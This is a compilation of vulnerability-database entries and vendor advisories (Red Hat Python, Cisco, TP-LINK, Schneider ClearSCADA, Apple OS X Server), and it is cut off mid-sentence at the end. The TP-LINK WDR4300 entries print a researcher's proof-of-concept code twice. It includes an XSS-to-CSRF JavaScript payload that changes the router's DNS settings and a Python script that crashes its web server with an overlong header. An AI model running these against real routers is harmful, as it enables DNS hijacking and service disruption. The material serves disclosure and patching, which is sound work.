Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
aarch64:
python-2.7.5-34.el7.aarch64.rpm
python-debuginfo-2.7.5-34.el7.aarch64.rpm
python-devel-2.7.5-34.el7.aarch64.rpm
python-libs-2.7.5-34.el7.aarch64.rpm
ppc64:
python-2.7.5-34.el7.ppc64.rpm
python-debuginfo-2.7.5-34.el7.ppc.rpm
python-debuginfo-2.7.5-34.el7.ppc64.rpm
python-devel-2.7.5-34.el7.ppc64.rpm
python-libs-2.7.5-34.el7.ppc.rpm
python-libs-2.7.5-34.el7.ppc64.rpm
ppc64le:
python-2.7.5-34.el7.ppc64le.rpm
python-debuginfo-2.7.5-34.el7.ppc64le.rpm
python-devel-2.7.5-34.el7.ppc64le.rpm
python-libs-2.7.5-34.el7.ppc64le.rpm
s390x:
python-2.7.5-34.el7.s390x.rpm
python-debuginfo-2.7.5-34.el7.s390.rpm
python-debuginfo-2.7.5-34.el7.s390x.rpm
python-devel-2.7.5-34.el7.s390x.rpm
python-libs-2.7.5-34.el7.s390.rpm
python-libs-2.7.5-34.el7.s390x.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64:
python-debug-2.7.5-34.el7.aarch64.rpm
python-debuginfo-2.7.5-34.el7.aarch64.rpm
python-test-2.7.5-34.el7.aarch64.rpm
python-tools-2.7.5-34.el7.aarch64.rpm
tkinter-2.7.5-34.el7.aarch64.rpm
ppc64:
python-debug-2.7.5-34.el7.ppc64.rpm
python-debuginfo-2.7.5-34.el7.ppc64.rpm
python-test-2.7.5-34.el7.ppc64.rpm
python-tools-2.7.5-34.el7.ppc64.rpm
tkinter-2.7.5-34.el7.ppc64.rpm
ppc64le:
python-debug-2.7.5-34.el7.ppc64le.rpm
python-debuginfo-2.7.5-34.el7.ppc64le.rpm
python-test-2.7.5-34.el7.ppc64le.rpm
python-tools-2.7.5-34.el7.ppc64le.rpm
tkinter-2.7.5-34.el7.ppc64le.rpm
s390x:
python-debug-2.7.5-34.el7.s390x.rpm
python-debuginfo-2.7.5-34.el7.s390x.rpm
python-test-2.7.5-34.el7.s390x.rpm
python-tools-2.7.5-34.el7.s390x.rpm
tkinter-2.7.5-34.el7.s390x.rpm
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2013-1752
https://access.redhat.com/security/cve/CVE-2013-1753
https://access.redhat.com/security/cve/CVE-2014-4616
https://access.redhat.com/security/cve/CVE-2014-4650
https://access.redhat.com/security/cve/CVE-2014-7185
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/articles/2039753
https://www.python.org/dev/peps/pep-0466/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFWTj/SXlSAg2UNWIIRAuXcAKCCJdw1P4H3y4fnhu6lXW2AcADYJgCfRO+v
qMX3qLAXBobeDiPX4eN9Pxc=
=JQMw
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201409-0403 | CVE-2014-3380 | Cisco Unified Communications Domain Manager Platform Software Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Unified Communications Domain Manager Platform Software 4.4(.3) and earlier allows remote attackers to cause a denial of service (CPU consumption) by sending crafted TCP packets quickly, aka Bug ID CSCuo42063.
A remote attacker may exploit this issue to trigger denial-of-service condition due to excessive CPU utilization.
This issue is being tracked by Cisco Bug ID CSCuo42063. This component features scalable, distributed, and highly available enterprise Voice over IP call processing
| VAR-201409-0078 | CVE-2014-4728 | TP-LINK N750 Wireless Dual Band Gigabit Router firmware Web Service disruption at the server (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The web server in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to cause a denial of service (crash) via a long header in a GET request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has a denial of service vulnerability that allows an attacker to exploit a vulnerability to initiate a denial of service attack. TP-LINK WDR4300 is prone to an HTML-injection vulnerability and a denial-of-service vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to cause denial-of-service conditions or execute attacker-supplied HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company.
Versions Affected: 130617 , possibly earlier
CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728
Vulnerabilities Description
===================
# Stored XSS -
It is possible inject javascript code via DHCP hostname field,
If the administrator will visit the dhcp clients page (web panel)
the script will execute.
Proof of Concept:
============
http://elisyan.com/tplink/wdr4300.html
---- start wdr4300.html ----
/*
Author: Oz Elisyan
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)
*/
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
}
}
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);
xmlhttp.send();
---- end wdr4300.html ----
http://elisyan.com/tplink/wdr4300.py
---- start wdr4300.py ----
#Author: Oz Elisyan
#TP-Link WDR4300 DoS PoC
import httplib
conn = httplib.HTTPConnection("192.168.0.1")
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
conn.request("GET","/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----
Report Timeline:
===========
2014-07-04:
Vendor notified about the vulnerabilities with all the relevant technical information.
2013-09-16:
Vendor released a fix.
Credits:
======
The Vulnerabilities was discovered by Oz Elisyan.
References:
========
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
| VAR-201409-0077 | CVE-2014-4727 | TP-LINK N750 Wireless Dual Band Gigabit Router firmware DHCP Cross-site scripting vulnerability in client page |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the DHCP clients page in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to inject arbitrary web script or HTML via the hostname in a DHCP request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has an HTML injection vulnerability because it does not adequately filter user-supplied input. Allows an attacker to exploit this vulnerability to execute arbitrary HTML or script code in the browser of an uninformed user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. Advisory Information
===============
Vendors Contacted: TP-LINK
Vendor Patched: Yes, Firmware 140916
System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others.
# DoS (web server) -
Denial of service condition to the device web server, remotely or locally send the
device a "GET" request with an extra "Header" with a long value (A x 3000 times).
Proof of Concept:
============
http://elisyan.com/tplink/wdr4300.html
---- start wdr4300.html ----
/*
Author: Oz Elisyan
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)
*/
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
}
}
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);
xmlhttp.send();
---- end wdr4300.html ----
http://elisyan.com/tplink/wdr4300.py
---- start wdr4300.py ----
#Author: Oz Elisyan
#TP-Link WDR4300 DoS PoC
import httplib
conn = httplib.HTTPConnection("192.168.0.1")
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
conn.request("GET","/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----
Report Timeline:
===========
2014-07-04:
Vendor notified about the vulnerabilities with all the relevant technical information.
2013-09-16:
Vendor released a fix.
Credits:
======
The Vulnerabilities was discovered by Oz Elisyan.
References:
========
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
| VAR-201409-0394 | CVE-2014-3367 | VMware for Cisco Nexus 1000V InterCloud of vCloud Director Component cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the vCloud Director component in Cisco Nexus 1000V InterCloud for VMware allows remote attackers to inject arbitrary web script or HTML via an unspecified value, aka Bug ID CSCuq90524. Cisco Nexus 1000V InterCloud for VMware is a set of virtual switch software from Cisco Systems that provides Cisco Catalyst switches such as QoS, ACLs, and SPAN in a VMware virtualized environment. vCloud Director is one of the VMware virtual cloud infrastructure tools components. The program did not adequately filter the user-submitted input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCuq90524
| VAR-201409-1258 | No CVE | TRENDnet TEW-818DRU has an unknown vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
TRENDnet TEW-818DRU is a routing device. There are unexplained vulnerabilities in TRENDnet TEW-818DRU and no detailed vulnerability details are available.
| VAR-201409-0395 | CVE-2014-3376 | Cisco IOS XR Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR 5.1 and earlier allows remote attackers to cause a denial of service (process reload) via a malformed RSVP packet, aka Bug ID CSCuq12031. Cisco IOS XR is a fully modular, distributed network operating system from Cisco's IOS software family.
This issue is being tracked by Cisco Bug ID CSCuq12031
| VAR-201409-0400 | CVE-2014-3377 | Cisco IOS XR of snmpd Service disruption in (DoS) Vulnerabilities |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
snmpd in Cisco IOS XR 5.1 and earlier allows remote authenticated users to cause a denial of service (process reload) via a malformed SNMPv2 packet, aka Bug ID CSCun67791. Cisco IOS XR is a fully modular, distributed network operating system from Cisco's IOS software family.
This issue is being tracked by Cisco Bug ID CSCun67791
| VAR-201409-0401 | CVE-2014-3378 | Cisco IOS XR of tacacsd Denial of service in Japan (DoS) Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
tacacsd in Cisco IOS XR 5.1 and earlier allows remote attackers to cause a denial of service (process reload) via a malformed TACACS+ packet, aka Bug ID CSCum00468. Cisco IOS XR is a fully modular, distributed network operating system from Cisco's IOS software family.
Attackers can exploit this issue to cause the TACACS+ process on the affected device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCum00468
| VAR-201409-0402 | CVE-2014-3379 | Cisco IOS XR Denial of Service Vulnerability |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR 5.1 and earlier on Network Convergence System 6000 devices allows remote attackers to cause a denial of service (NPU and card hang or reload) via a malformed MPLS packet, aka Bug ID CSCuq10466. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCuq10466
| VAR-201409-0722 | CVE-2014-5411 | Schneider Electric ClearSCADA Cross-Site Scripting Vulnerability |
CVSS V2: 3.5 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Schneider Electric StruxureWare SCADA Expert ClearSCADA 2010 R3 through 2014 R1 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. ClearSCADA is an integrated SCADA host platform that includes a rotation training engine, real-time database, web server, alarm processor and reporting software. A cross-site scripting vulnerability exists in the ClearSCADA WEB interface that allows an attacker to exploit a vulnerability to construct a malicious URI, to induce user resolution, and to perform system management operations. Scada Expert Clearscada is prone to a cross-site scripting vulnerability. Schneider Electric StruxureWare SCADA Expert ClearSCADA is a set of energy efficiency management software monitoring platform of French Schneider Electric (Schneider Electric). The platform is primarily used for remote management of critical infrastructure
| VAR-201409-0501 | CVE-2014-4406 | Apple OS X Server of CoreCollaboration of Xcode Server Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Xcode Server in CoreCollaboration in Apple OS X Server before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue is fixed in Mac OS X Server version 3.2.1. The software enables file sharing, meeting scheduling, website hosting, network remote access, and more. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-10-16-3 OS X Server v4.0
OS X Server v4.0 is now available and addresses the following:
BIND
Available for: OS X Yosemite v10.10 or later
Impact: Multiple vulnerabilities in BIND, the most serious of which
may lead to a denial of service
Description: Multiple vulnerabilities existed in BIND. These issues
were addressed by updating BIND to version 9.9.2-P2
CVE-ID
CVE-2013-3919
CVE-2013-4854
CVE-2014-0591
CoreCollaboration
Available for: OS X Yosemite v10.10 or later
Impact: A remote attacker may be able to execute arbitrary SQL
queries
Description: A SQL injection issue existed in Wiki Server. This
issue was addressed through additional validation of SQL queries.
CVE-ID
CVE-2014-4424 : Sajjad Pourali (sajjad@securation.com) of CERT of
Ferdowsi University of Mashhad
CoreCollaboration
Available for: OS X Yosemite v10.10 or later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A cross-site scripting issue existed in Xcode Server.
This issue was addressed through improved encoding of HTML output.
CVE-ID
CVE-2014-4406 : David Hoyt of Hoyt LLC
CoreCollaboration
Available for: OS X Yosemite v10.10 or later
Impact: Multiple vulnerabilities in PostgreSQL, the most serious of
which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in PostgreSQL. These
issues were addressed by updating PostgreSQL to version 9.2.7.
CVE-ID
CVE-2014-0060
CVE-2014-0061
CVE-2014-0062
CVE-2014-0063
CVE-2014-0064
CVE-2014-0065
CVE-2014-0066
Mail Service
Available for: OS X Yosemite v10.10 or later
Impact: Group SACL changes for Mail may not be respected until after
a restart of the Mail service
Description: SACL settings for Mail were cached and changes to the
SACLs were not respected until after a restart of the Mail service.
This issue was addressed by resetting the cache upon changes to the
SACLs.
CVE-ID
CVE-2014-4446 : Craig Courtney
Profile Manager
Available for: OS X Yosemite v10.10 or later
Impact: Multiple vulnerabilities in LibYAML, the most serious of
which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in LibYAML. These
issues were addressed by switching from YAML to JSON as Profile
Manager's internal serialization format.
CVE-ID
CVE-2013-4164
CVE-2013-6393
Profile Manager
Available for: OS X Yosemite v10.10 or later
Impact: A local user may obtain passwords after setting up or
editing profiles in Profile Manager
Description: In certain circumstances, setting up or editing
profiles in Profile Manager may have logged passwords to a file. This
issue was addressed through improved handling of credentials.
CVE-ID
CVE-2014-4447 : Mayo Jordanov
Server
Available for: OS X Yosemite v10.10 or later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 when a cipher suite uses a block cipher in CBC mode. An attacker
could force the use of SSL 3.0, even when the server would support a
better TLS version, by blocking TLS 1.0 and higher connection
